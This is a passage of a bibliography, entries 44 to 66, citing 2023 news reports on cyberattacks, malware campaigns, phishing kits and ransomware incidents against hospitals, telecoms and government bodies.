[44] V. Pandagle, “OpIndonesia: Ministry of Public Works and Housing Faces DDoS Attack by Garnesia Team,” The Cyber Express, Sep. 18, 2023. Available: https://thecyberexpress.com/ministry-of-public-works-cyber-attack/. [Accessed: Oct. 01, 2023]

[45] “Website.” Available: https://thecyberwire.com/stories/f4a30f84eb754a21b4d200300a4c7abb/earth-luscas-cyberespionage-techniques

[46] I. Ilascu, “W3LL phishing kit hijacks thousands of Microsoft 365 accounts, bypasses MFA,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/security/w3ll-phishing-kit-hijacks-thousands-of-microsoft-365-accounts-bypasses-mfa/. [Accessed: Oct. 01, 2023]

[47] “Website.” Available: https://thehackernews.com/2023/08/mmrat-android-trojan-executes-remote.html

[48] M. J. Schwartz and R. Ross, “LokiBot Information Stealer Packs Fresh Infection Strategies.” Available: https://www.govinfosecurity.com/lokibot-information-stealer-packs-fresh-infection-strategies-a-23079. [Accessed: Oct. 01, 2023]

[49] M. Bagwe and R. Ross, “Australian Law Firm Hack Affected 65 Government Agencies.” Available: https://www.govinfosecurity.com/australian-law-firm-hack-affected-65-government-agencies-a-23110. [Accessed: Oct. 02, 2023]

[50] 2023 THN Sep 22, “Iranian Nation-State Actor OilRig Targets Israeli Organizations,” The Hacker News, Sep. 22, 2023. Available: https://thehackernews.com/2023/09/iranian-nation-state-actor-oilrig.html. [Accessed: Oct. 02, 2023]

[51] J. Marusak, “Russian cyber thieves linked to personal data breach at North Carolina hospitals,” Yahoo News, Sep. 16, 2023. Available: https://news.yahoo.com/russian-cyber-thieves-linked-personal-202630737.html. [Accessed: Oct. 02, 2023]

[52] T. Ganacharya, “Microsoft 365 Defender demonstrates 100 percent protection coverage in the 2023 MITRE Engenuity ATT&CK® Evaluations: Enterprise,” Microsoft Security Blog, Sep. 20, 2023. Available: https://www.microsoft.com/en-us/security/blog/2023/09/20/microsoft-365-defender-demonstrates-100-percent-protection-coverage-in-the-2023-mitre-engenuity-attck-evaluations-enterprise/. [Accessed: Oct. 02, 2023]

[53] B. Toulas, “Microsoft: Stealthy Flax Typhoon hackers use LOLBins to evade detection,” BleepingComputer, Aug. 25, 2023. Available: https://www.bleepingcomputer.com/news/security/microsoft-stealthy-flax-typhoon-hackers-use-lolbins-to-evade-detection/. [Accessed: Oct. 02, 2023]

[54] “NY: Carthage, Claxton-Hepburn hospitals target of cyber attack.” Available: https://www.databreaches.net/ny-carthage-claxton-hepburn-hospitals-target-of-cyber-attack/. [Accessed: Sep. 29, 2023]

[55] M. K. McGee and R. Ross, “Just Kids Dental Says Nearly 130K People Affected by Attack.” Available: https://www.govinfosecurity.com/just-kids-dental-says-nearly-130k-people-affected-by-attack-a-23019. [Accessed: Oct. 01, 2023]

[56] “More victims of MOVEit breach are revealed: Nuance discloses for covered entities (UPDATE 1).” Available: https://www.databreaches.net/more-victims-of-moveit-breach-are-revealed-nuance-discloses-for-covered-entities/. [Accessed: Oct. 02, 2023]

[57] L. Abrams, “Ragnar Locker claims attack on Israel’s Mayanei Hayeshua hospital,” BleepingComputer, Sep. 08, 2023. Available: https://www.bleepingcomputer.com/news/security/ragnar-locker-claims-attack-on-israels-mayanei-hayeshua-hospital/. [Accessed: Oct. 02, 2023]

[58] V. Pandagle, “T-Mobile Cyber Attack or Glitch? 8 Alleged Breaches Since 2018 as Company Denies Allegations,” The Cyber Express, Sep. 22, 2023. Available: https://thecyberexpress.com/t-mobile-cyber-attack-glitch-firm-responds/. [Accessed: Oct. 02, 2023]

[59] B. Toulas, “‘Sandman’ hackers backdoor telcos with new LuaDream malware,” BleepingComputer, Sep. 21, 2023. Available: https://www.bleepingcomputer.com/news/security/sandman-hackers-backdoor-telcos-with-new-luadream-malware/. [Accessed: Oct. 02, 2023]

[60] I. Arghire, “Iranian Cyberspies Deployed New Backdoor to 34 Organizations,” SecurityWeek, Sep. 12, 2023. Available: https://www.securityweek.com/iranian-cyberspies-deployed-new-backdoor-to-34-organizations/. [Accessed: Oct. 02, 2023]

[61] “Website.” Available: https://thecyberwire.com/newsletters/daily-briefing/12/177

[62] B. Toulas, “Hackers backdoor telecom providers with new HTTPSnoop malware,” BleepingComputer, Sep. 19, 2023. Available: https://www.bleepingcomputer.com/news/security/hackers-backdoor-telecom-providers-with-new-httpsnoop-malware/. [Accessed: Oct. 02, 2023]

[63] A. Khaitan, “Monti Ransomware Group Claims Auckland University of Technology Data Breach,” The Cyber Express, Sep. 22, 2023. Available: https://thecyberexpress.com/auckland-university-of-technology-breach-monti/. [Accessed: Oct. 02, 2023]

[64] “Website.” Available: https://thecyberwire.com/newsletters/daily-briefing/12/174

[65] 2023 THN Sep 11, “Charming Kitten’s New Backdoor ‘Sponsor’ Targets Brazil, Israel, and U.A.E,” The Hacker News, Sep. 11, 2023. Available: https://thehackernews.com/2023/09/charming-kitens-new-backdoor-sponsor.html. [Accessed: Oct. 02, 2023]

[66] A. M.-D. La Cruz, 219 News Now 9/20/2023, (Sep. 20, 2023). Available: https://www.nwitimes.com/news/local/education/crown-point-schools-victim-of-ransomware-attack/article_1ee07b98-57ff-11ee-bb41-5fe43ab302d8.html. [Accessed: Oct. 02, 2023]